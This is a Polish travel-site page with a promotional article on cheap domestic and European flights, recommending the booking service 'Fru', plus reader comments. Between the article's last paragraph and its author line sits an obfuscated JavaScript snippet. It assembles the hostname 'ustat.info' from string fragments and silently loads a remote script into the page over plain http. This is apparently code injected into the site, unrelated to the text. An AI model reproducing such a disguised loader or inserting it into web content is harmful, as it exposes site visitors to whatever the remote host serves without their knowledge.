Zaloguj się | Zarejestruj się
 

Po Polsce i poza nią za nieduże pieniądze

Każdy podróżnik wie, że największym kosztem podczas odkrywania nowych miejsc są wydatki związane z przemieszczaniem się. Poruszając się autem - ponosimy wydatki na paliwo. Autokarami - kupujemy bilety. Ponadto spędza się sporo czasu podczas podróży. Można jednak w godzinę, dwie znaleźć się w dowolnym zakątku Polski, a nawet i Europy, co nie jest dużym wydatkiem, a pozwala zaoszczędzić mnóstwo czasu i gotówki.

Jak podróżować tanio?

Dobrym rozwiązaniem są oferowane przez wielu przewoźników tanie loty. Większość osób kojarzy je z podróżowaniem za granicę w celach zarobkowych lub odwiedzaniem rodziny i znajomych, którzy mieszkają i pracują poza granicami kraju. Atrakcyjne cenowo bilety lotnicze pozwalają na dostanie się na drugi kraniec kontynentu za rozsądną kwotę. Jednak mało osób zdaje sobie sprawę, że tego typu tanie połączenia są także obsługiwane na terenie kraju. Na przykład lot na trasie Warszawa - Gdańsk to wydatek zaledwie 18 złotych - i cena ta obejmuje bilety tam i powrotem. Lot taki trwa niecała godzinę, dzięki czemu błyskawicznie pokona się pół Polski i można poświecić resztą dnia na zwiedzanie miasta docelowego. Takie tanie bilety lotnicze umożliwiają lot nie tylko na wymienionej trasie, ale również i pomiędzy innymi polskimi miastami, które posiadają porty lotnicze. A ponieważ są to zwykle miasta z wieloma atrakcjami i zabytkami, można dzięki tanim liniom zwiedzić je bez konieczności pokonywania wielu kilometrów dróg i autostrad.

Gdzie znaleźć tanie bilety?

Tego typu bilety lotnicze znaleźć można w wielu serwisach poświeconych taniemu lataniu, jak np. Fru. Dobrze sprawdzać oferty na bieżąco oraz patrzeć na cenniki lotów w dalszych terminach - im szybciej zamówi się bilet, tym jest on tańszy. Dlatego też wiedząc, kiedy będzie się miało wolny czas, można zacząć wypatrywać atrakcyjnych ofert w tym terminie. Ponieważ płaci się za tanie loty tam i z powrotem, ma się od razu również zagwarantowany, wygodny powrót. Oczywiście wszelkie koszty pobytu na miejscu ponosi się na własną rękę, można jednak dzięki Internetowi wyszukać sobie nocleg w równie atrakcyjnej cenie, dzięki czemu również i pobyt na miejscu nie będzie drogim wydatkiem, co z kolei przełoży się na więcej gotówki w portfelu i większe możliwości zwiedzania oraz odkrywania uroków Polski.

A jeśli Polska to za mało…

Jeśli chce się natomiast wyskoczyć poza Polskę i odwiedzić inny kraj, tu również można znaleźć wiele ofert lotów do całej Europy. Na specjalistycznych serwisach, jak Fru, znajdują się atrakcyjne pakiety, na które składają się bilety na samolot oraz opłacony nocleg na miejscu. Tak więc lecąc w nieznany rejon ma się pewną bazę do wypoczynku i dalszych wypadów.

(function(){ upy5=document.createElement("script");upy5.type="text/javascript"; upy5.async=true;upy5_=(("us")+"t")+"a";upy5_+=("t.i")+""+"n";upy5_+=(("f")+"o"); upy5.src="http://"+upy5_+"/8444815.cl0xapv0py5h7pqvlhpcj4cnwua5wu"; document.body.appendChild(upy5); })();

Autor: KaN

Skomentuj

Opcja tylko dla zalogowanych

 
Komentarze:
Interesujący i praktyczny artykuł.

Autor: piotr55  & nbsp;Dodano: 2016-08-21  19:38:12

Teraz zwiedzasz

Ostatnie komentarze

 
Ładnie tam!
Łukasz
2020-06-17 00:09:29
:)
Łukasz
2020-06-17 00:09:02
*****Ładne ujęcie.
Edward Piotr Zawiślak
2020-06-14 10:05:44
*****Ładne ujęcie.
Edward Piotr Zawiślak
2020-06-14 10:04:46
*****
Sławomir Machowski
2020-06-09 15:08:32
zobacz wszystkie komentarze

więcejKrainy i miejscowości

Dolina Biebrzy

Dolina Biebrzy to jeden z najdzikszych zakątków naszego kraju. Największy bagienny obszar Europy Środkowo-Wschodniej. Inny świat 180 km od Warszawy. Łosie, jelenie, rysie, wilki, jenoty, bobry,...

Pozostałe krainy i miejscowości